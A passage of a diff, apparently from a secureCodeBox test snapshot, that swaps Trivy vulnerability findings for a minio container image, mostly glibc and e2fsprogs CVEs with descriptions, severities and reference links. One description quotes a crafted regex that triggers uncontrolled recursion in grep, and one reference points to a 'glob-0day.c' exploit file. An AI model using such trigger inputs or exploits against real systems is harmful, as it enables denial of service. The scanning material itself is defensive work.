"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2953", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-2953", - "https://bugs.openldap.org/show_bug.cgi?id=9904", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", - "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "null pointer dereference in ber_memalloc_x function", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2953", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2953", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2015-3276", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://rhn.redhat.com/errata/RHSA-2015-2131.html", - "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", - "http://www.securitytracker.com/id/1034221", - "https://access.redhat.com/security/cve/CVE-2015-3276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", - "https://linux.oracle.com/cve/CVE-2015-3276.html", - "https://linux.oracle.com/errata/ELSA-2015-2131.html", - "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", - "https://www.cve.org/CVERecord?id=CVE-2015-3276", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "incorrect multi-keyword mode cipherstring parsing", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2015-3276", - }, - { - "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1034221", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2015-3276", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], "severity": "LOW", @@ -61168,46 +61579,56 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-14159", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://www.openldap.org/its/index.cgi?findid=8703", - "https://access.redhat.com/security/cve/CVE-2017-14159", - "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", - "https://www.cve.org/CVERecord?id=CVE-2017-14159", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openldap: Privilege escalation via PID file manipulation", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-14159", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi?findid=8703", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-14159", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010022", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], "severity": "LOW", @@ -61216,61 +61637,61 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-17740", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", - "http://www.openldap.org/its/index.cgi/Incoming?id=8759", - "https://access.redhat.com/security/cve/CVE-2017-17740", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", - "https://www.cve.org/CVERecord?id=CVE-2017-17740", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, "category": "Vulnerability", - "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-17740", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-17740", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, ], "severity": "LOW", @@ -61279,71 +61700,66 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-15719", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", - "https://access.redhat.com/errata/RHBA-2019:3674", - "https://access.redhat.com/security/cve/CVE-2020-15719", - "https://bugs.openldap.org/show_bug.cgi?id=9266", - "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", - "https://www.cve.org/CVERecord?id=CVE-2020-15719", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", ], }, "category": "Vulnerability", - "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "openldap: Certificate validation incorrectly matches name against CN-ID", + "name": "glibc: ASLR bypass using cache of thread stack and heap", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15719", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHBA-2019:3674", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15719", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], "severity": "LOW", @@ -61352,619 +61768,662 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libmount1", + "id": "CVE-2019-1010025", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010025", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", + "id": "CVE-2019-9192", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc6", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - }, - { - "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - }, - { - "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - }, - { - "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", + "id": "CVE-2022-1304", + "installedVersion": "1.46.2-2", + "packageName": "libcom-err2", "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "https://access.redhat.com/errata/RHSA-2022:8361", + "https://access.redhat.com/security/cve/CVE-2022-1304", + "https://bugzilla.redhat.com/2069726", + "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "https://errata.rockylinux.org/RLSA-2022:8361", + "https://linux.oracle.com/cve/CVE-2022-1304.html", + "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "https://ubuntu.com/security/notices/USN-5464-1", + "https://www.cve.org/CVERecord?id=CVE-2022-1304", ], }, "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", + "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://avd.aquasec.com/nvd/cve-2022-1304", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://access.redhat.com/errata/RHSA-2022:8361", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://access.redhat.com/security/cve/CVE-2022-1304", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://bugzilla.redhat.com/2069726", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://errata.rockylinux.org/RLSA-2022:8361", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://ubuntu.com/security/notices/USN-5464-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", + "fixedVersion": "7.74.0-1.3+deb11u5", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": 